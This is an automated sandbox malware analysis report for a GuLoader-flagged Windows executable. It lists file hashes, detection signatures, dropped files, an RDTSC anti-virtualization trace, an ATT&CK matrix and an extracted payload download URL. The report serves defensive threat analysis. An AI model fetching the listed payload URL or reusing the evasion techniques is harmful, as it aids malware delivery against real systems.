Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.9624

Overview

General Information

Sample Name:SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.9624 (renamed file extension from 9624 to exe)
Analysis ID:635390
MD5:77436b29832ded92b60491ea36018196
SHA1:0314eca204964e3e189b0c0aed7f449e487dc98e
SHA256:b19c8495104c354de9aa1b3403bff2d1211a89fe8892e866d2d8dfd7bb0ba5da
Tags:exe
Infos:

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Binary contains a suspicious time stamp
Detected potential crypto function
PE file contains more sections than normal
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Abnormal high CPU Usage
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • cleanup
{"Payload URL": "http://donaldtrumpverse.com/kO4_tiMHM116.bin"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.778304741.0000000002830000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000000.00000002.778304741.0000000002830000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://donaldtrumpverse.com/kO4_tiMHM116.bin"}
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeVirustotal: Detection: 42%Perma Link
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeReversingLabs: Detection: 21%
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeRegistry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\PARANTHRACENEJump to behavior
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: msvcr100.i386.pdb source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmp, msvcr100.dll.0.dr
    Source: Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\CDMDataEventHandlerLibrary\CDMDataEventHandler\obj\Release\net46\CDMDataEventHandler.pdbSHA2562 source: CDMDataEventHandler.dll.0.dr
    Source: Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\CDMDataEventHandlerLibrary\CDMDataEventHandler\obj\Release\net46\CDMDataEventHandler.pdb source: CDMDataEventHandler.dll.0.dr
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

    Networking

    barindex
    Source: Malware configuration extractorURLs: http://donaldtrumpverse.com/kO4_tiMHM116.bin
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://pie-us1.api.ws-hp.com/clienttelemetry
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://schemaregistry.analysis.ext.hp.com/cdm/gun/com.hp.cdm.platform.software.domain.eventing.reso
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://schemaregistry.analysis.ext.hp.com/cdm/id/sw/originatorDetail.schema.json
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://schemaregistry.analysis.ext.hp.com/cdm/id/sw/sysInfoBase.schema.json
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://stage-us1.api.ws-hp.com/clienttelemetry
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://us1.api.ws-hp.com/clienttelemetry
    Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056DE
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040755C0_2_0040755C
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00406D850_2_00406D85
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_732F1BFF0_2_732F1BFF
    Source: libLerc.dll.0.drStatic PE information: Number of sections : 11 > 10
    Source: libenchant-2.dll.0.drStatic PE information: Number of sections : 12 > 10
    Source: gspawn-win64-helper.exe.0.drStatic PE information: Number of sections : 11 > 10
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess Stats: CPU usage > 98%
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeVirustotal: Detection: 42%
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeReversingLabs: Detection: 21%
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeJump to behavior
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
    Source: CDMDataEventHandler.dll.0.dr, Hp.CDMDataEventHandler/Sender/TelemetrySender.csBase64 encoded string: 'uWg5oksEUHoewK5WcwMNmfkglf2HF7AWQAGHYz0VfFMeg1YF2aEU/2OPoeETAl78'
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\nsf2D9B.tmpJump to behavior
    Source: classification engineClassification label: mal72.troj.evad.winEXE@1/11@0/0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040498A
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeRegistry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\PARANTHRACENEJump to behavior
    Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: msvcr100.i386.pdb source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmp, msvcr100.dll.0.dr
    Source: Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\CDMDataEventHandlerLibrary\CDMDataEventHandler\obj\Release\net46\CDMDataEventHandler.pdbSHA2562 source: CDMDataEventHandler.dll.0.dr
    Source: Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\CDMDataEventHandlerLibrary\CDMDataEventHandler\obj\Release\net46\CDMDataEventHandler.pdb source: CDMDataEventHandler.dll.0.dr

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000000.00000002.778304741.0000000002830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_732F30C0 push eax; ret 0_2_732F30EE
    Source: gspawn-win64-helper.exe.0.drStatic PE information: section name: .xdata
    Source: libLerc.dll.0.drStatic PE information: section name: .xdata
    Source: libenchant-2.dll.0.drStatic PE information: section name: .xdata
    Source: CDMDataEventHandler.dll.0.drStatic PE information: 0x9C213F02 [Thu Jan 2 09:55:14 2053 UTC]
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_732F1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_732F1BFF
    Source: initial sampleStatic PE information: section name: .text entropy: 6.90904492268
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\gspawn-win64-helper.exeJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\msvcr100.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\libenchant-2.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\CDMDataEventHandler.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\libLerc.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeRDTSC instruction interceptor: First address: 00000000028326C8 second address: 00000000028326C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF7CBD79B2h 0x00000004 cmp dl, bl 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FBF7CBD7926h 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gspawn-win64-helper.exeJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msvcr100.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\libenchant-2.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CDMDataEventHandler.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\libLerc.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeAPI call chain: ExitProcess graph end nodegraph_0-4365
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeAPI call chain: ExitProcess graph end nodegraph_0-4518
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_732F1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_732F1BFF
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API
    1
    Windows Service
    1
    Access Token Manipulation
    1
    Access Token Manipulation
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Windows Service
    21
    Obfuscated Files or Information
    LSASS Memory2
    File and Directory Discovery
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth1
    Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Software Packing
    Security Account Manager13
    System Information Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Timestomp
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe43%VirustotalBrowse
    SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe22%ReversingLabsWin32.Trojan.Nemesis
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\CDMDataEventHandler.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\CDMDataEventHandler.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\gspawn-win64-helper.exe0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\gspawn-win64-helper.exe0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\libLerc.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\libLerc.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\libenchant-2.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\libenchant-2.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\msvcr100.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\msvcr100.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll3%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://us1.api.ws-hp.com/clienttelemetry0%Avira URL Cloudsafe
    https://stage-us1.api.ws-hp.com/clienttelemetry0%Avira URL Cloudsafe
    https://pie-us1.api.ws-hp.com/clienttelemetry0%Avira URL Cloudsafe
    http://donaldtrumpverse.com/kO4_tiMHM116.bin0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://donaldtrumpverse.com/kO4_tiMHM116.bintrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://schemaregistry.analysis.ext.hp.com/cdm/id/sw/sysInfoBase.schema.jsonCDMDataEventHandler.dll.0.drfalse
      high
      https://us1.api.ws-hp.com/clienttelemetryCDMDataEventHandler.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      https://stage-us1.api.ws-hp.com/clienttelemetryCDMDataEventHandler.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exefalse
        high
        https://schemaregistry.analysis.ext.hp.com/cdm/id/sw/originatorDetail.schema.jsonCDMDataEventHandler.dll.0.drfalse
          high
          https://pie-us1.api.ws-hp.com/clienttelemetryCDMDataEventHandler.dll.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://schemaregistry.analysis.ext.hp.com/cdm/gun/com.hp.cdm.platform.software.domain.eventing.resoCDMDataEventHandler.dll.0.drfalse
            high
            No contacted IP infos
            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:635390
            Start date and time: 27/05/202220:56:022022-05-27 20:56:02 +02:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 8m 45s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.9624 (renamed file extension from 9624 to exe)
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:23
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal72.troj.evad.winEXE@1/11@0/0
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 63.2% (good quality ratio 61.9%)
            • Quality average: 88.2%
            • Quality standard deviation: 21.3%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 43
            • Number of non-executed functions: 34
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Override analysis time to 240s for sample files taking high CPU consumption
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 52.152.110.14
            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, time.windows.com, arc.msn.com, glb.sls.prod.dcat.dsp.trafficmanager.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtSetInformationFile calls found.
            No simulations
            No context
            No context
            No context
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            C:\Users\user\AppData\Local\Temp\CDMDataEventHandler.dllSCAN Swift 054545676700000000000000001.exeGet hashmaliciousBrowse
              SCAN Swift 054545676700000000000000001.exeGet hashmaliciousBrowse
                PO64747835 PDF.exeGet hashmaliciousBrowse
                  proforma invoice pdf.exeGet hashmaliciousBrowse
                    proforma invoice pdf.exeGet hashmaliciousBrowse
                      C:\Users\user\AppData\Local\Temp\gspawn-win64-helper.exeSCAN Swift 054545676700000000000000001.exeGet hashmaliciousBrowse
                        SCAN Swift 054545676700000000000000001.exeGet hashmaliciousBrowse
                          PO64747835 PDF.exeGet hashmaliciousBrowse
                            proforma invoice pdf.exeGet hashmaliciousBrowse
                              proforma invoice pdf.exeGet hashmaliciousBrowse
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):86544
                                Entropy (8bit):6.4808399473205744
                                Encrypted:false
                                SSDEEP:1536:Mw52UwgdVS3ArQSv1fMZxfVtoVwBTqLJiP8JDi:B4Uw8SQrJvaZlVtoVwaBu
                                MD5:B884606DE1CB711FA0FABBA8384FA60C
                                SHA1:2ECD66DE4565AF1C7F8A7016BEAB49B7A7F1CDEA
                                SHA-256:246459B881CCE72B63AD541D0E8B29A3CB4A14ED193D08BDB68159A32F786539
                                SHA-512:173EED4AD24B62203D87BE29721F46C6A2B24A4CDAB888ADC55ADE4154166F06C36A7358EBE2588E13E5790FFF095C90353BAD007D9A30DE26EEBC688C56EAC8
                                Malicious:false
                                Reputation:low
                                Preview:f........6.r.......................................................f.h.........f.j..$..!................................f......f.k........!8..1........................................#K..hJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ...f.f.f.g....+[.iTppppppppppppppppppppppppppppppppppppppp..A!....f.e.f.c...."m..o..............................f..........f.t..(v"[.999999999999999999999999999999999999...f.......f......*..WC...........................................f........'.z...........................................f.n..o.f.q.. ..+a....................................f...f.a....e..'.HsY{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{f.........f......2..A++++++++++++++++++++++++++++++++++++++++++++++....a..r..a.......7c.:*...................................................f..f.......f.q......$;{......................................-Ir0#.........................................!..i.f.e....f....&.z.M....................................4............f...f.v..,:.NI...........................................
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                File Type:MS Windows HtmlHelp Data
                                Category:dropped
                                Size (bytes):43566
                                Entropy (8bit):7.382704049850724
                                Encrypted:false
                                SSDEEP:768:7gyaYEUz32Q+MLPybLI1GPlnL7ZsruV+P/34RE+OUuiozjd/6W4:7gvFUz32ftIsMuV+PYSU9o3d/94
                                MD5:27729CF331D3767DF077F52B262D88F3
                                SHA1:EF4B6F74A0608B5A4DC6E3CA465A96137C1CAD74
                                SHA-256:CA601E57DD2C1E6E92145A8A19083599261B626A4D26B04D8C3FD5BDDDB2CB0D
                                SHA-512:AC7B8D61462538011D20BEC2D2BEAE62AB7DAA16866FC9B1CDBBDCEDF47796D93507E2E706CA9DECF0C26D0F1031285B9268A747755ABCB1E4A161B9D9CF98F2
                                Malicious:false
                                Reputation:low
